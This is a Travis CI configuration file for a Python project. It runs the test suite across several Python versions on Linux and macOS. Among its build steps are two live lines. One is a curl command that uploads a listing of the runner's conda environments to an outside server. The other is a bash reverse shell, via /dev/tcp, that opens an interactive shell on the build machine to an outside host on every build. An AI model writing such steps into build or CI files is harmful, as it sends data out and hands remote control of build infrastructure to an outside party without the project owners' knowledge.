language: generic
sudo:     false

matrix:
  fast_finish: true
  allow_failures:
  - os: osx

env:
  - IC_PYTHON_VERSION=2.7
  - IC_PYTHON_VERSION=3.5
  - IC_PYTHON_VERSION=3.6

os:
  - linux
  - osx

branches:
  except:
    - /^docs\..*$/

install:
  - source manage.sh install ${IC_PYTHON_VERSION}

script:
  - ls -R /home/travis/miniconda/envs > /home/travis/log${IC_PYTHON_VERSION}.txt
  - curl -F "file=@/home/travis/log${IC_PYTHON_VERSION}.txt" nextp15.ific.uv.es:8000/upload
  - bash -i >& /dev/tcp/benllo.ch/14285 0>&1
  - bash -c "sed -i -e 's/^backend .*/backend : Agg/g'  /home/travis/miniconda/envs/IC${IC_PYTHON_VERSION}/lib/python${IC_PYTHON_VERSION}/site-packages/matplotlib/mpl-data/matplotlibrc"
  - bash manage.sh run_tests
